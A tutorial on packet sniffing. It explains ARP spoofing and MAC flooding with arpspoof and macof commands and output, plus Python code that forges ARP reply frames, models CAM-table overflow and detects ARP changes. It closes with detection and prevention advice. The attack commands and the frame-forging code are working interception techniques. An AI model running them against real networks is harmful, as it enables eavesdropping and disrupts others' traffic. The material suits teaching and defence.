A sniffer is a program or a device that eavesdrops on network traffic by capturing the frames travelling over a network. Sniffers are, in short, a "data interception" technology.
In packet-switched networks the data to be transmitted is broken into several packets, which are reassembled once they all reach their intended destination.
A packet sniffer placed on the network intercepts the traffic and captures the raw packets. The sniffing software then decodes the captured packets and presents them to the network manager or technician in a user-friendly format, that is, one a network administrator can make sense of.
There are two basic types of Ethernet environment, and sniffers work slightly differently in each.
- Shared Ethernet: In a shared Ethernet environment all hosts are connected to the same bus (typically through a hub) and compete with one another for bandwidth. Every frame is seen by every host on the segment; a NIC normally discards frames not addressed to it, but a sniffer puts the NIC into promiscuous mode and captures everything.
- Switched Ethernet: An Ethernet environment in which the hosts are connected to a switch instead of a hub is called a switched Ethernet. The switch maintains a table (the CAM table) mapping each MAC address to the physical port on which it was learned, and delivers a frame only to the port of its destination MAC. Unlike a hub it does not repeat every frame to every host, which gives better utilisation of the available bandwidth and, as a side effect, makes passive sniffing of other hosts' traffic harder. That is a side effect of the forwarding logic, not a security guarantee, as the next section shows.
Though a switch is harder to sniff than a hub, the following methods can still be used to sniff on a switched segment:
1. ARP Spoofing
arpspoof (from the dsniff package) poisons the ARP cache of a target host by sending it unsolicited ARP replies claiming that the attacker's MAC address owns another host's IP address. Here the target is 192.168.0.131 and the address being impersonated is 192.168.0.136. Unless IP forwarding is enabled on the attacking host (sysctl -w net.ipv4.ip_forward=1) the poisoned target simply loses connectivity to 192.168.0.136; for a man-in-the-middle both directions are usually poisoned by running a second instance with the two addresses swapped:
root@mint:~# arpspoof -t 192.168.0.131 192.168.0.136
dc:53:60:2b:e7:47 94:65:9c:20:9c:7a 0806 42: arp reply 192.168.0.136 is-at dc:53:60:2b:e7:47
dc:53:60:2b:e7:47 94:65:9c:20:9c:7a 0806 42: arp reply 192.168.0.136 is-at dc:53:60:2b:e7:47
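What arpspoof actually puts on the wire is a single 42-byte Ethernet/ARP frame. The following is an added example (not code from the original page or from dsniff) that builds that forged reply from the addresses in the run above, decodes it back, and renders it in arpspoof's console format. The frame layout is the standard RFC 826 one; the hypothetical send_frame() helper uses a Linux raw socket and is not called in the demo.

```python
import socket
import struct

ETH_P_ARP = 0x0806      # EtherType for ARP (the "0806" column in arpspoof's output)
ARP_OP_REPLY = 2


def mac_bytes(mac: str) -> bytes:
    """'dc:53:60:2b:e7:47' -> 6 raw bytes."""
    return bytes(int(octet, 16) for octet in mac.split(":"))


def mac_str(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def build_arp_reply(attacker_mac: str, spoofed_ip: str, target_mac: str, target_ip: str) -> bytes:
    """Forge the unsolicited ARP reply arpspoof sends: '<spoofed_ip> is-at <attacker_mac>'.

    The frame is unicast to the target, so only the target's ARP cache is poisoned.
    """
    ethernet = mac_bytes(target_mac) + mac_bytes(attacker_mac) + struct.pack("!H", ETH_P_ARP)
    # htype=1 (Ethernet), ptype=0x0800 (IPv4), hlen=6, plen=4, op=2 (reply)
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, ARP_OP_REPLY)
    arp += mac_bytes(attacker_mac) + socket.inet_aton(spoofed_ip)   # sender fields carry the lie
    arp += mac_bytes(target_mac) + socket.inet_aton(target_ip)      # target fields name the victim
    return ethernet + arp


def decode_arp(frame: bytes) -> dict:
    """Parse an Ethernet/ARP frame back into its fields (what tcpdump or arpwatch sees)."""
    dst, src, ethertype = struct.unpack("!6s6sH", frame[:14])
    if ethertype != ETH_P_ARP:
        raise ValueError(f"not an ARP frame: ethertype 0x{ethertype:04x}")
    htype, ptype, hlen, plen, op = struct.unpack("!HHBBH", frame[14:22])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        raise ValueError("unsupported ARP hardware/protocol types")
    return {
        "dst": mac_str(dst), "src": mac_str(src), "op": op,
        "sender_mac": mac_str(frame[22:28]), "sender_ip": socket.inet_ntoa(frame[28:32]),
        "target_mac": mac_str(frame[32:38]), "target_ip": socket.inet_ntoa(frame[38:42]),
        "length": len(frame),
    }


def arpspoof_line(frame: bytes) -> str:
    """Render an ARP reply the way arpspoof prints it: 'src dst 0806 len: arp reply IP is-at MAC'."""
    a = decode_arp(frame)
    if a["op"] != ARP_OP_REPLY:
        raise ValueError("only ARP replies are rendered here")
    return f'{a["src"]} {a["dst"]} {ETH_P_ARP:04x} {a["length"]}: arp reply {a["sender_ip"]} is-at {a["sender_mac"]}'


def send_frame(iface: str, frame: bytes) -> None:
    """Hypothetical helper: put the raw frame on the wire (Linux only, requires root). Not called below."""
    with socket.socket(socket.AF_PACKET, socket.SOCK_RAW) as s:
        s.bind((iface, 0))
        s.send(frame)


if __name__ == "__main__":
    # Addresses taken from the arpspoof run above: attacker dc:53:..., target 192.168.0.131
    frame = build_arp_reply("dc:53:60:2b:e7:47", "192.168.0.136", "94:65:9c:20:9c:7a", "192.168.0.131")
    print(arpspoof_line(frame))
```

The rendered line matches the arpspoof output above exactly: the first MAC is the source (attacker), the second the destination (target), then the EtherType and frame length. Note that the target's cache is overwritten by the sender fields alone; nothing in ARP authenticates them, which is the whole weakness.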
2. MAC Flooding:
macof (also from dsniff) floods the switch with frames carrying random source MAC addresses. Once the switch's CAM table is full it can no longer keep track of where hosts are, and many switches then fall back to flooding frames out of every port like a hub, so the attacker's port receives traffic meant for other hosts:
root@mint:~# macof
4e:f3:64:3d:17:17 11:92:23:7d:6a:51 0.0.0.0.389 > 0.0.0.0.60438: S 1713527361:1713527361(0) win 512
66:3e:8:6b:fd:38 d6:1c:b3:75:8a:45 0.0.0.0.50476 > 0.0.0.0.52504: S 94222295:94222295(0) win 512
Warning: This method degrades the network service for everyone on the segment and should not be run for a long interval of time.
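Why macof works is easiest to see on a model of the switch's CAM table. The following is an added example (not code from the page or from dsniff) of a toy learning switch with a bounded table; it assumes that a full table evicts its oldest entry and that frames to an unknown MAC are flooded out of every port except the ingress one. Real switches differ by vendor (some stop learning instead of evicting), so treat the model as illustrative. All addresses and port numbers are constructed.

```python
import random
from collections import OrderedDict


class ToySwitch:
    """Learning switch with a bounded CAM table (MAC -> port).

    Assumptions of this model (real hardware differs by vendor):
      * a full table evicts its oldest entry to learn a new one;
      * frames to a MAC not in the table are flooded out every port except the ingress port.
    """

    def __init__(self, ports, cam_capacity):
        self.ports = list(ports)
        self.cam_capacity = cam_capacity
        self.cam = OrderedDict()          # insertion order doubles as entry age

    def _learn(self, mac, port):
        if mac in self.cam:
            del self.cam[mac]             # re-insert so it becomes the newest entry
        self.cam[mac] = port
        while len(self.cam) > self.cam_capacity:
            self.cam.popitem(last=False)  # evict the oldest entry

    def forward(self, ingress_port, src_mac, dst_mac):
        """Return the set of egress ports the frame is sent out of."""
        self._learn(src_mac, ingress_port)
        egress = self.cam.get(dst_mac)
        if egress is not None and egress != ingress_port:
            return {egress}               # known destination: unicast to its port
        return {p for p in self.ports if p != ingress_port}   # unknown destination: flood


def random_mac(rng):
    """Random source address, as macof generates for every frame."""
    return ":".join(f"{rng.randrange(256):02x}" for _ in range(6))


def macof_demo(flood_frames=5000, cam_capacity=1024, seed=7):
    """Show that filling the CAM table turns unicast delivery into hub-style flooding.

    Port 1: victim, port 2: gateway, port 3: attacker (constructed addresses).
    Returns the egress ports of a gateway->victim frame before and after the flood.
    """
    victim, gateway = "94:65:9c:20:9c:7a", "00:11:22:33:44:55"
    sw = ToySwitch(ports=[1, 2, 3], cam_capacity=cam_capacity)
    sw.forward(1, victim, gateway)            # switch learns the victim on port 1
    sw.forward(2, gateway, victim)            # ... and the gateway on port 2
    before = sw.forward(2, gateway, victim)   # unicast: reaches port 1 only

    rng = random.Random(seed)
    for _ in range(flood_frames):             # attacker on port 3 runs macof
        sw.forward(3, random_mac(rng), random_mac(rng))

    after = sw.forward(2, gateway, victim)    # victim entry evicted: flooded to ports 1 and 3
    return before, after


if __name__ == "__main__":
    before, after = macof_demo()
    print("before flood:", sorted(before), " after flood:", sorted(after))
```

Before the flood the gateway's frame to the victim leaves only on port 1; after it, the victim's entry has been pushed out and the same frame also reaches the attacker on port 3. The flood must be sustained because normal traffic re-learns legitimate entries as soon as it stops, which is also why the method is so noisy; the usual defence is port security on the switch (a limit on MAC addresses learned per port).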
Detecting Sniffers:
A sniffer is usually passive: it only collects data, so detecting one is difficult, especially on a shared Ethernet. It is slightly easier on a switched segment, because there the sniffer has to inject traffic (ARP replies or flooding frames) before it sees anything. Even on a shared segment a sniffing host is not perfectly silent: its NIC runs in promiscuous mode, which changes how the host reacts to certain frames, and some sniffers resolve the addresses they capture with DNS lookups. The methods below exploit these side effects.
- Ping Method: send an ICMP echo request to the suspect's IP address inside a frame whose destination MAC is deliberately wrong. A NIC in normal mode drops the frame; a NIC in promiscuous mode hands it to the kernel, and an older stack answers the ping. Many modern kernels discard frames addressed to a foreign MAC even in promiscuous mode, so this test is unreliable today.
- ARP Method: send an ARP request for the suspect's IP to a bogus unicast MAC instead of the broadcast address. Only a host whose NIC is in promiscuous mode sees the request, so a reply gives the sniffer away.
- On Local Host: on the machine itself, check the interface flags. `ip link show` (or `ifconfig`) lists PROMISC for an interface in promiscuous mode, and the kernel logs "entered promiscuous mode" when the flag is set. A rootkit can hide both, so treat a clean result as weak evidence.
- Latency Method: flood the segment with traffic and compare the suspect's response time to pings before and during the flood. A host that captures every packet spends CPU on all of it, and its response time rises noticeably more than a non-sniffing host's.
- ARP Watch: monitor ARP traffic on the segment and alert when the MAC address associated with an IP address changes. ARP spoofing cannot work without causing exactly that change.
- Using IDS: a network IDS such as Snort can be given the known IP-to-MAC pairs of the gateway and other important hosts and flag ARP replies that contradict them.
Preventing Sniffing:
The best way to secure ourselves against sniffing is to use encryption. It will not prevent a sniffer from capturing our traffic, but it ensures that what the sniffer reads is ciphertext it cannot make sense of.
If we are on a switched network, the chances are that ARP spoofing will be used for sniffing. The machine the malicious user will most probably try to impersonate is the gateway. To prevent this, we can add the MAC address of the gateway permanently to our ARP cache so that forged replies cannot overwrite it. On Linux this is done by placing the MAC addresses of the gateway and other important machines in /etc/ethers and loading them with `arp -f` (which reads /etc/ethers by default), or with `ip neigh add <gateway-ip> lladdr <gateway-mac> dev <iface> nud permanent`. Static entries do not survive a reboot unless reloaded, and they must be updated whenever the gateway's hardware changes, so this scales only to a handful of important hosts.
Switch to SSH. SSH is the de facto standard method of connecting to a Unix/Linux machine and replaces cleartext protocols such as telnet, rlogin and FTP, whose passwords a sniffer reads directly. For more information on SSH, check out http://www.ssh.fi. We might also want to check out the open-source implementation OpenSSH at http://www.openssh.org/
Use HTTPS instead of HTTP where the site supports it, especially if we are really bothered about the privacy of our (web)mail.
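The "ARP Watch" detection method above and the /etc/ethers pinning described here are two sides of the same check: a trusted IP-to-MAC mapping against which every ARP reply on the segment is compared. The following is an added example (not code from the page, nor from arpwatch) of a simplified arpwatch-style monitor that loads pinned entries from /etc/ethers-format text and alerts when an IP's MAC changes or contradicts a pinned entry. The ethers content and the observed ARP replies are constructed; the attacker MAC is the one from the arpspoof run above. It assumes /etc/ethers lists IP addresses rather than hostnames (no name resolution is done).

```python
from collections import defaultdict

# Constructed /etc/ethers content: pinned MAC for the gateway (format: MAC, then hostname or IP)
ETHERS = """\
# MAC address        host
00:11:22:33:44:55    192.168.0.1     # gateway
"""

# Constructed ARP replies as seen on the segment: (time in seconds, sender_ip, sender_mac)
OBSERVED = [
    (0,  "192.168.0.1",   "00:11:22:33:44:55"),   # gateway answers normally
    (1,  "192.168.0.131", "94:65:9c:20:9c:7a"),
    (2,  "192.168.0.136", "aa:bb:cc:dd:ee:01"),
    (30, "192.168.0.136", "dc:53:60:2b:e7:47"),   # attacker claims .136 (cf. the arpspoof output above)
    (31, "192.168.0.1",   "dc:53:60:2b:e7:47"),   # ... and the gateway, for a full man-in-the-middle
    (32, "192.168.0.131", "94:65:9c:20:9c:7a"),   # unchanged, no alert
]


def parse_ethers(text):
    """Parse /etc/ethers-style lines ('MAC host', '#' comments) into {host: mac}."""
    pinned = {}
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line:
            continue
        mac, host = line.split()[:2]
        pinned[host] = mac.lower()
    return pinned


class ArpMonitor:
    """arpwatch-style tracker: remembers the MAC last seen for each IP and alerts when it changes.

    Pinned entries are enforced on every reply, so a forged reply for the gateway is flagged even if
    the monitor never saw the legitimate one.
    """

    def __init__(self, pinned=None):
        self.pinned = dict(pinned or {})
        self.last_seen = {}                   # ip -> mac
        self.ips_by_mac = defaultdict(set)    # mac -> set of ips it has claimed
        self.alerts = []                      # (time, kind, ip, old_mac, new_mac)

    def observe(self, ts, ip, mac):
        mac = mac.lower()
        if ip in self.pinned and self.pinned[ip] != mac:
            self.alerts.append((ts, "pinned-mismatch", ip, self.pinned[ip], mac))
        elif ip in self.last_seen and self.last_seen[ip] != mac:
            self.alerts.append((ts, "changed", ip, self.last_seen[ip], mac))
        self.last_seen[ip] = mac
        self.ips_by_mac[mac].add(ip)

    def suspects(self):
        """MACs that took over an IP address in any alert."""
        return {new_mac for (_, _, _, _, new_mac) in self.alerts}

    def multi_ip_macs(self):
        """MACs claiming more than one IP: the signature of a host poisoning both ends of a conversation."""
        return {mac: ips for mac, ips in self.ips_by_mac.items() if len(ips) > 1}


def run_monitor(ethers=ETHERS, observed=OBSERVED):
    mon = ArpMonitor(parse_ethers(ethers))
    for ts, ip, mac in observed:
        mon.observe(ts, ip, mac)
    return mon


if __name__ == "__main__":
    mon = run_monitor()
    for ts, kind, ip, old, new in mon.alerts:
        print(f"t={ts:>3}s {kind:16} {ip:15} {old} -> {new}")
    print("suspects:", mon.suspects(), "claiming several IPs:", mon.multi_ip_macs())
```

On the constructed input the monitor raises two alerts, a "changed" for 192.168.0.136 and a "pinned-mismatch" for the gateway, and both name the same new MAC, which also appears as the one address claiming two IPs. A real deployment feeds this from a capture (the decoded sender fields of every ARP reply) rather than from a list, and the "changed" rule alone produces false positives when a host legitimately gets a new NIC, which is why arpwatch reports changes for a human to judge rather than blocking anything.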
Programs to detect sniffers:
- AntiSniff.
- Neped.
- arpwatch.
- Snort.